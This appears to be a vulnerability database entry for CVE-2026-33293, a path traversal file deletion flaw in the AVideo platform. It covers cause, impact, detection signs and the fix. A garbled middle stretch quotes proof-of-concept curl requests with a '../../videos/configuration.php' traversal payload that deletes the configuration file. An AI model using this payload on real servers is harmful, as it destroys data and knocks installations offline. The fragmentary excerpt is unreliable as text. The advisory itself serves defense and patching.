
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33293 is an arbitrary file deletion vulnerability via path traversal in the WWBN AVideo open-source video platform, specifically in the plugin/CloneSite/cloneServer.json.php endpoint's deleteDump parameter. It affects all AVideo versions up to and including 25.0, with version 26.0 introducing the fix. The vulnerability was published on March 18, 2026, and assigned a CVSS v3.1 base score of 8.1 (High) (GitHub Advisory, AVideo Security Advisory).
The root cause is CWE-22 (Path Traversal): the deleteDump GET parameter in plugin/CloneSite/cloneServer.json.php is concatenated directly into a file path passed to PHP's unlink() function without any sanitization via basename(), realpath(), or equivalent normalization. The $clonesDir variable is constructed as {$videosDir}clones/, and the unsanitized user input is appended directly, allowing traversal sequences like ../../videos/configuration.php to resolve outside the intended directory. Exploitation requires valid clone credentials (a URL and key pair approved by an admin via thisURLCanCloneMe()), which are service-level credentials held by any approved clone partner — not an admin session. A complete proof-of-concept using curl is publicly documented in the security advisory (AVideo Security Advisory, GitHub Advisory).
Successful exploitation allows an authenticated attacker with low privileges to delete any file readable by the web server process, including configuration.php (which contains database credentials and is require_once'd by nearly every endpoint), .htaccess access-control files, uploaded videos and user photos, and SQL database dumps. Deleting configuration.php causes a complete denial of service, rendering the entire AVideo installation non-functional with fatal errors on every page load. Removing .htaccess or plugin security files can expose protected directories and weaken the application's security posture, potentially enabling further attacks such as unauthorized data access or privilege escalation (AVideo Security Advisory).
A proof-of-concept exploit consisting of concrete curl commands is publicly available in the GitHub security advisory, making exploitation straightforward for any attacker possessing valid clone credentials (AVideo Security Advisory). There is no evidence of in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.04% (0.000400), indicating a currently low probability of exploitation in the next 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
'a') by an AVideo admin — these are service-level credentials held by any approved clone partner.configuration.php) is present and accessible:curl -s "https://avideo.local/videos/configuration.php" -o /dev/null -w "%{http_code}"
# Expected: 200, 302, or 403 — file existsdeleteDump parameter containing directory traversal sequences:curl -s "https://avideo.local/plugin/CloneSite/cloneServer.json.php?url=https://approved-clone.local&key=VALID_CLONE_KEY&deleteDump=../../videos/configuration.php"{"error":false,...} confirms unlink() succeeded. Verify by re-requesting the file:curl -s "https://avideo.local/videos/configuration.php" -o /dev/null -w "%{http_code}"
# Expected: 404 or 500 — file deletedconfiguration.php deleted, the entire AVideo application becomes non-functional (fatal errors on all pages). Alternatively, delete .htaccess files to expose protected directories or remove plugin/auth files to weaken security controls for further attacks (AVideo Security Advisory)./plugin/CloneSite/cloneServer.json.php containing deleteDump parameters with path traversal sequences (e.g., ../../, %2e%2e%2f); requests from unexpected source IPs using valid clone credentials.cloneServer.json.php with deleteDump values containing .. sequences; JSON responses with "error":false and "msg":"Delete Dump ..\/..\/..." patterns in application logs.configuration.php, .htaccess, or plugin configuration files in expected locations under the AVideo web root; unexpected missing files in the videos/ directory (uploaded media, SQL dumps).require_once files (e.g., configuration.php); previously protected directories becoming accessible without authentication.The recommended remediation is to upgrade AVideo to version 26.0 or later, which includes the patch commit 941decd that applies basename() to strip path traversal components and uses realpath() to verify the resolved path remains within $clonesDir before calling unlink() (AVideo Patch Commit). As interim mitigations: restrict web server process file system permissions to the minimum necessary (principle of least privilege); deploy a WAF rule to block requests to cloneServer.json.php containing .. or encoded traversal sequences in the deleteDump parameter; audit and rotate all clone credentials; and maintain regular backups of critical application files and database dumps to enable recovery (GitHub Advisory).
The vulnerability was reported by a researcher credited as "offset" and published by the AVideo maintainer (DanielnetoDotCom) on March 18, 2026. Coverage appeared on security aggregators including Tenable, VulDB, CIRCL, and INCIBE-CERT shortly after NVD publication. Social media posts on Bluesky noted the vulnerability, and security blogs such as infinitsec.net and yazoul.net published advisories summarizing the issue (AVideo Security Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."